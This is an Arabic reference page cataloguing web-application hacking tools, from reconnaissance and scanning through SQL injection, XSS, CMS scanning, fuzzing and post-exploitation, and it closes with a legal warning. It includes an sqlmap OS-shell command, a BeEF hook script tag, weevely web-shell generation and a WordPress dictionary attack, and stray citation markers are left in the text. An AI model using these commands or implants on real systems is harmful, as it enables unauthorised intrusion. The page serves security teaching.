أدوات Web Hacking
اختبار اختراق تطبيقات الويب - من الاستطلاع إلى الاستغلال والتقرير
منهجية اختبار تطبيقات الويب
الاستطلاع وجمع المعلومات
Reconnaissance - نطاقات فرعية، تكنولوجيا الموقع، خوادم DNS
Amass, WhatWeb, Wappalyzer, Nmapاكتشاف المحتوى
Content Discovery - مسارات مخفية، ملفات احتياطية، معامل
Gobuster, Dirb, Ffufتحليل حركة المرور
Traffic Analysis - اعتراض وتعديل الطلبات
Burp Suite, OWASP ZAP, Caidoالمسح الآلي
Automated Scanning - اكتشاف الثغرات الشائعة
Nikto, Wapiti, Nucleiاستغلال الثغرات
Exploitation - حقن SQL، XSS، XXE، SSRF، وغيرها
SQLmap, XSStrike, BeEFما بعد الاستغلال
Post-Exploitation - رفع صلاحيات، تنفيذ أوامر
weevely, PHP Reverse Shell, Metasploitالتوثيق والتقارير
Reporting - توثيق الثغرات وخطوات الإصلاح
Dradis, Faraday, CherryTreeOWASP Top 10 (2025)
وكلاء اعتراض HTTP/HTTPS
تحليل وتعديل حركة المرور بين المتصفح والخادمBurp Suite
👑 المعيار الذهبيأشهر منصة لاختبار أمان تطبيقات الويب. توفر وكيل اعتراض، ماسح آلي (Community محدود)، مكرر طلبات، محلل، وهجوم بالقاموس. النسخة المجتمعية مجانية وقوية جداً للاختبار اليدوي [citation:2][citation:10].
burpsuite
تشغيل الواجهة
Burp → Proxy → Intercept → On
اعتراض الطلبات
📌 الاستخدامات الرئيسية:
- اعتراض وتعديل الطلبات
- هجمات القاموس (Intruder)
- إعادة إرسال الطلبات (Repeater)
- تحليل خريطة الموقع
OWASP ZAP
🆓 مفتوح المصدرZed Attack Proxy - بديل Burp المجاني بالكامل من OWASP. يوفر ماسح آلي متكامل، وكيل اعتراض، ومجموعة كبيرة من الإضافات. مثالي للتكامل مع CI/CD [citation:6][citation:7].
zaproxy
تشغيل الواجهة
zap-cli quick-scan https://example.com
فحص سريع
Caido
🆕 واجهة حديثةوكيل اعتراض حديث وسريع مع واجهة مستخدم عصرية. بديل خفيف لـ Burp مع تصميم أنيق وتركيز على تجربة المستخدم. متوفر في مستودعات كالي.
caido
تشغيل
OWASP Mantra
🦊 متصفح مخترقمتصفح فايرفوكس معدّل مسبقاً بعشرات الإضافات لاختبار الاختراق. يتضمن HackBar، أدوات تعديل الهيدرز، تحليل الكوكيز، وواجهة متكاملة للاختبارات اليدوية [citation:9].
owasp-mantra-ff
تشغيل المتصفح
ماسحات ويب آلية
اكتشاف الثغرات الأمنية بشكل آليNikto
📋 ماسح خوادمماسح خوادم ويب شهير يكتشف الملفات الخطيرة، الإصدارات القديمة، ومشاكل التهيئة. يفحص أكثر من 7000 ملف/برنامج ضار [citation:4].
nikto -h https://example.com
فحص أساسي
nikto -h 192.168.1.1 -ssl -port 443
فحص SSL
Wapiti
🐍 Pythonماسح ويب من نوع black-box يكتشف SQLi، XSS، XXE، Command Execution، CRLF، وShellshock. يدعم تسجيل الدخول واستعادة الجلسات [citation:1].
wapiti -u https://example.com
فحص أساسي
wapiti -u https://example.com -m sql,xss
وحدات محددة
Nuclei
⚡ قالب-مرتكزماسح ثغرات سريع يعتمد على YAML templates. مجتمع ضخم وآلاف القوالب الجاهزة لـ CVEs، تهيئات خاطئة، واكتشاف التقنيات [citation:5].
nuclei -u https://example.com
فحص أساسي
nuclei -l urls.txt -t cves/
فحص CVEs
WhatWeb
🔍 كشف التقنياتأداة متقدمة لكشف التقنيات المستخدمة في المواقع (CMS، خوادم، مكتبات JavaScript، إضافات). يدعم 1800+ توقيع [citation:5].
whatweb example.com
كشف التقنيات
whatweb -a 3 example.com
فحص أعمى
wafw00f
🛡️ كشف WAFأداة متخصصة في كشف جدران حماية تطبيقات الويب (WAF) وتحديد نوعها. أساسي قبل بدء أي اختبار [citation:5].
wafw00f https://example.com
كشف WAF
حقن SQL - SQL Injection
اكتشاف واستغلال ثغرات قواعد البياناتSQLmap
💣 ملك SQLiأقوى أداة آلية لاكتشاف واستغلال ثغرات SQL Injection. تدعم 6 تقنيات حقن، 50+ نوع قاعدة بيانات، وتستطيع قراءة الملفات، تنفيذ الأوامر، وتجاوز المصادقة [citation:2][citation:7].
sqlmap -u "http://example.com/page.php?id=1"
فحص أساسي
sqlmap -u "http://example.com/page.php?id=1" --dbs
عرض قواعد البيانات
sqlmap -u "http://example.com/login.php" --data="user=admin&pass=test"
حقن POST
sqlmap -r request.txt -p id --os-shell
من ملف طلب
jSQL Injection
🖥️ واجهة رسوميةأداة SQL Injection بواجهة رسومية سهلة. تدعم الحقن الآلي، مدير كلمات المرور، وحقن الملفات. مناسبة للمبتدئين.
jsql
تشغيل
BBQSQL
🔥 Boolean Blindأداة متخصصة في SQL Injection العمياء (Boolean Blind). سريعة جداً وتدعم طلبات مخصصة. مثالية عند عدم ظهور أخطاء.
bbqsql --config config.json
تشغيل
XSS وهجمات المتصفح
Cross-Site Scripting واستغلال المتصفحاتXSStrike
⚡ ماسح XSS متقدمماسح XSS ذكي يستخدم محلل السياق، زاحف، ومولد بايلودات متقدم. يكتشف WAF ويتجاوزه. من أقوى أدوات XSS الآلية.
xsstrike -u "http://example.com/page.php?q=test"
فحص
xsstrike -u "http://example.com" --crawl
زحف
BeEF
🐂 Browser ExploitationBrowser Exploitation Framework - إطار عمل لاستغلال المتصفحات. يتحكم بالمتصفحات المخترقة (hooked) وينفذ أوامر (اعتراض، كيلوغر، هجمات داخلية) [citation:8].
beef-xss
تشغيل
http://127.0.0.1:3000/ui/panel
واجهة التحكم
<script src="http://:3000/hook.js"></script>
Hook
Dalfox
🦊 سريعماسح XSS سريع مكتوب بلغة Go. يدعم تحليل المعاملات، فحص التابعية، وتوليد بايلودات ذكية. مناسب للمعالجة الآلية.
dalfox url http://example.com/page.php?id=1
فحص
HackBar Quantum
🧪 إضافة متصفحإضافة متصفح شهيرة لتسريع اختبارات XSS و SQLi. تشفير/فك تشفير، توليد بايلودات، وتعديل الطلبات بسرعة [citation:6].
أنظمة إدارة المحتوى (CMS)
اختبار WordPress, Joomla, Drupal والمزيدWPScan
🔵 ماسح ووردبريسالماسح الرسمي لووردبريس. يكتشف الإصدارات، الثغرات، الإضافات، القوالب، والمستخدمين. يستخدم قاعدة بيانات CVE محدثة [citation:5].
wpscan --url https://example.com
فحص أساسي
wpscan --url https://example.com --enumerate u,vp
تعداد
wpscan --url https://example.com --passwords rockyou.txt
هجوم قاموس
JoomScan
🟢 ماسح جوملاماسح متخصص لاكتشاف الثغرات في Joomla. يحدد الإصدار، الإضافات، القوالب، وملفات التهيئة الحساسة.
joomscan -u https://example.com
فحص
Droopescan
🍂 متعدد CMSماسح CMS متعدد يدعم Drupal، SilverStripe، Joomla، Moodle، WordPress. خفيف وسريع.
droopescan scan drupal -u https://example.com
دروبال
Fuzzing واكتشاف المحتوى
مسارات مخفية، ملفات، معامل، واستضافة افتراضيةffuf
⚡ أسرع Fuzzerأداة fuzzing سريعة جداً بلغة Go. تكتشف المسارات، المعامل، الاستضافة الافتراضية، وملفات النسخ الاحتياطي [citation:5][citation:10].
ffuf -u https://example.com/FUZZ -w wordlist.txt
مسارات
ffuf -u https://example.com?file=FUZZ -w params.txt
معامل
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w subdomains.txt
VHost
Gobuster
🔍 مكتشف المحتوىأداة متعددة الاستخدامات لاكتشاف المسارات (dir)، النطاقات الفرعية (dns)، وملفات النسخ الاحتياطي. سريعة ومستقرة [citation:4][citation:5].
gobuster dir -u https://example.com -w wordlist.txt
دلائل
gobuster dns -d example.com -w subdomains.txt
نطاقات فرعية
Dirb
📁 كلاسيكيأداة قديمة لكن موثوقة لاكتشاف الدلائل والملفات. تأتي مع قوائم كلمات مدمجة [citation:4].
dirb https://example.com
فحص
wfuzz
🐝 مرن وقويأداة fuzzing متقدمة تدعم حقن متعدد، فلترة النتائج، وكوكيز. مرنة جداً لاختبارات مخصصة.
wfuzz -c -z file,wordlist.txt https://example.com/FUZZ
فحص
أطر عمل متكاملة لاختبار الويب
منصات شاملة تغطي دورة الاختبار الكاملةMetasploit
💣 إطار عملإطار عمل شهير لاستغلال الثغرات، لكنه يحتوي أيضاً على وحدات متخصصة لاختبار الويب: HTTP Scanner, Tomcat, WordPress, Joomla exploits [citation:2][citation:7].
msfconsole
تشغيل
use auxiliary/scanner/http/
وحدات ويب
Kali Automation Suite
🤖 أتمتة متكاملةمجموعة نصوص برمجية لأتمتة سير عمل اختبار الويب: تعداد النطاقات، فحص المنافذ، كشف التقنيات، مسح الثغرات بـ Nuclei، واختبار SQL آمن. تصميم احترافي مع تحقق إلزامي من الترخيص [citation:5].
python3 kali_automation_recon.py example.com ~/recon/
استطلاع
python3 kali_automation_webapp.py https://example.com ~/webapp/
اختبار ويب
W3AF
🕷️ إطار هجومإطار عمل لاختبار الاختراق واكتشاف واستغلال ثغرات الويب. يحتوي على واجهة رسومية وواجهة سطر أوامر [citation:7].
w3af_gui
واجهة رسومية
w3af_console
سطر أوامر
Arachni
🦂 ماسح متكاملماسح ويب متكامل بواجهة ويب وتقارير تفاعلية. يدعم إعادة المحاولة الذكية وتقليل النتائج الإيجابية الخاطئة [citation:7].
arachni_web
واجهة ويب
أدوات متنوعة
هجمات متخصصة وأدوات مساعدةCommix
⌨️ Command Injectionأداة آلية لاكتشاف واستغلال ثغرات حقن الأوامر (Command Injection). تدعم تقنيات متعددة وتستطيع فتح شل عكسي.
commix -u "http://example.com/page.php?cmd=test"
فحص
XXE Injector
📄 XXEأداة لاكتشاف واستغلال ثغرات XXE (XML External Entity). تقرأ الملفات المحلية وتستدعي خدمات خارجية.
ruby xxeinjector.rb --url=http://example.com/xxe
فحص
Weevely
🐚 PHP Web Shellأداة لإدارة Web Shells مكتوبة بلغة PHP. توفر واجهة سطر أوامر للتحكم بالخادم المخترق، رفع/تنزيل ملفات، وتنفيذ أوامر.
weevely generate password shell.php
توليد شيل
weevely http://example.com/shell.php password
اتصال
بيئات تدريب تطبيقات الويب
OWASP Juice Shop
تطبيق CTF متكامل مع ثغرات OWASP Top 10. مثالي للمبتدئين والمحترفين [citation:6].
Juice ShopPortSwigger Web Academy
أكاديمية مجانية من مطوري Burp Suite مع معامل تفاعلية [citation:2].
Web Academy⚠️ تحذير أخلاقي وقانوني مهم
أدوات اختبار اختراق تطبيقات الويب هي أسلحة ذات حدين. استخدامها على أنظمة لا تملك إذناً كتابياً صريحاً لاختبارها غير قانوني ويعرضك للمساءلة الجنائية والمدنية [citation:5].
يجب أن يكون لديك:
- إذن كتابي واضح من مالك النظام
- نطاق اختبار محدد (URLs/IPs)
- قواعد اشتباك متفق عليها
- خطة للإبلاغ عن الثغرات الحرجة
استخدم هذه الأدوات للتعلم، البحث الأمني، برامج المكافآت، والمشاريع المملوكة لك فقط.